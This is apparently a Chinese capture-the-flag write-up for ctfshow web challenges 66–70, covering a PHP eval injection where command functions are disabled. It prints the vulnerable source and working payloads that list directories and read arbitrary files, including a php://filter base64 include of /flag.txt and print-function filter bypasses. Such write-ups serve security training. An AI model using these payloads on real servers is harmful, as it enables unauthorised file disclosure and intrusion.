ctfshow(66->70)--RCE/命令执行漏洞--禁用命令执行函数

Web66

源代码:

复制代码
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

代码审计:

POST传参c,eval进行代码执行。

思路:

由于题目过滤了命令执行函数,所以使用其他方法进行RCE。

先使用c=var_dump(scandir("."))查看当前目录下的文件,发现了flag.php
highlight_file('flag.php')查看发现没有flag.

于是使用c=var_dump(scandir("/"))查看根目录,发现flag.txt

EXP:

复制代码
c=highlight_file('/flag.php');

得到flag.

Web67

与上一题做法相同。

Web68

进入界面,回显为一个报错:

代码审计:

说明highlight_file()函数被禁用了。

思路:

用php伪协议查看文件内容。

EXP:

复制代码
c=include($_POST[1]);&1=php://filter/convert.base64-encode/resource=/flag.txt

base64解码得到flag.

Web69

回显与上一题相同。

思路

查看目录下的文件:

复制代码
c=var_dump(scandir("/"));
c=print_r(scandir("/"));

发现两个打印函数都被过滤了。

替换为var_export或implode即可。

EXP:

查看目录:

复制代码
c=var_export(scandir("/"));
c=echo implode("--",scandir("/"));

读取文件内容:

复制代码
c=include("/flag.txt");

Web 70

与上一题做法相同。

相关推荐
北京耐用通信9 分钟前
协议转换新标杆!耐达讯自动化Ethernet IP转CC-Link方案,让编码器‘说话‘更高效“
人工智能·物联网·网络协议·网络安全·自动化·信息与通信
汤愈韬14 分钟前
知识点1:防火墙是如何方式IP欺骗的
网络协议·网络安全·security·huawei
重生之我在番茄自学网安拯救世界24 分钟前
网络安全中级阶段学习笔记(一):弱口令与暴力破解核心知识点梳理
网络安全·暴力破解·弱口令
clown_YZ1 小时前
HeroCTF 2025--部分题解
网络安全·逆向·ctf
文刀竹肃1 小时前
theHarvester - 企业信息收集工具详解
安全·网络安全
FreeBuf_1 小时前
恶意npm包利用隐藏提示和脚本规避AI安全工具检测
人工智能·安全·npm
NewCarRen1 小时前
AI驱动的网联自动驾驶汽车网络安全测试方法
网络安全
北京阿尔泰科技1 小时前
冬季安全用电监测案例
安全·自动化
爬山算法1 小时前
Redis(160)Redis的安全问题如何解决?
数据库·redis·安全
北京耐用通信2 小时前
突破协议壁垒:耐达讯自动化Ethernet/IP转CC-Link网关在工业互联中的核心应用
人工智能·网络协议·安全·自动化·信息与通信